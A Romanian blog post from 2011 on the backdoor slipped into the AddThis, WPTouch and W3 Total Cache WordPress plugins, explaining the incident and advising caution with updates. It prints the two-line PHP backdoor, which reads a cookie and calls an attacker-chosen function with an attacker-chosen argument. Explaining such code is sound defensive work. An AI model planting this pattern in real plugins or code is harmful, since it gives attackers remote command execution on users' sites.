Extensiile WordPress au fost modificate neautorizat – cum arată backdoor-ul?

Posted on Iunie 28, 2011. Filed under: Internet | Etichete:, , , |

În urmă cu câteva zile, trei dintre cele mai populare extensii WordPress (AddThis, WPTouch şi W3 Total Cache) au realizat o sincronizare în depozitul pluginurilor prin care adăugau un backdoor maliţios. Asta a forţat WordPress.org să reseteze toate parolele ca o precauţie. Reacţia celor de la WordPress a fost de nota 10, incidentul fiind aplanat în scurt timp iar extensiile WordPress fiind izolate cu succes.

Din păcate, evenimentul nu se termină aici iar curiozitatea ne împinge mai departe de unde dorim să vedem cum arată backdoorul descoperit de WordPress. Oficialii WordPress susţin că au remarcat câteva sincronizări ale depozitului suspicioase care aveau în conţinut backdoor-uri mascate inteligent. Să vedem cât de bine ascunse erau.

1.if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
2.               $this->desired_view = $matches[1].$matches[2];

Aparent, codul nu spune prea multe lucruri care să creeze suspiciuni. Cineva care navighează prin cod nu va sesiza intenţia maliţioasă a celor două linii de cod. Totuşi, dacă analizăm cu atenţie, remarcăm că se verifică existenţa unei anumite variabile COOKIE iar dacă aceasta există, parsează conţinutul în variabila $matches, după care execută codul apelând $matches[1]($matches[2]) ce poate fi orice funcţii cu orice parametri. Cineva ar putea apela astfel funcţia eval, system sau chiar exec, permiţându-i rularea oricărei comenzi pe site-ul utilizatorului.

Acest anunţ ridică mai multe semnale de alarmă. Pe lângă faptul că trebuie să ne asigurăm că ultimile actualizări ale extensiilor nu au afectat cu nimic securitatea blogurilor noastre, trebuie să luăm lucrurile mai preventiv chiar şi atunci când e vorba de actualizări ale extensiilor. Riscul ca un dezvoltator al unei extensii care este instalată şi pe blogul dumneavoastră să fie compromis sunt foarte mari, mai ales atunci când sunteţi sigur că aveţi “prieteni” care nu-s aşa de încântaţi de prezenţa dumneavoastră în online.

Sursa: http://www.worldit.info

Make a Comment

Lasă un răspuns

Completează mai jos detaliile despre tine sau dă clic pe un icon pentru autentificare:

Logo WordPress.com

Comentezi folosind contul tău WordPress.com. Dezautentificare / Schimbă )

Poză Twitter

Comentezi folosind contul tău Twitter. Dezautentificare / Schimbă )

Fotografie Facebook

Comentezi folosind contul tău Facebook. Dezautentificare / Schimbă )

Fotografie Google+

Comentezi folosind contul tău Google+. Dezautentificare / Schimbă )

Conectare la %s

Liked it here?
Why not try sites on the blogroll...

%d blogeri au apreciat asta: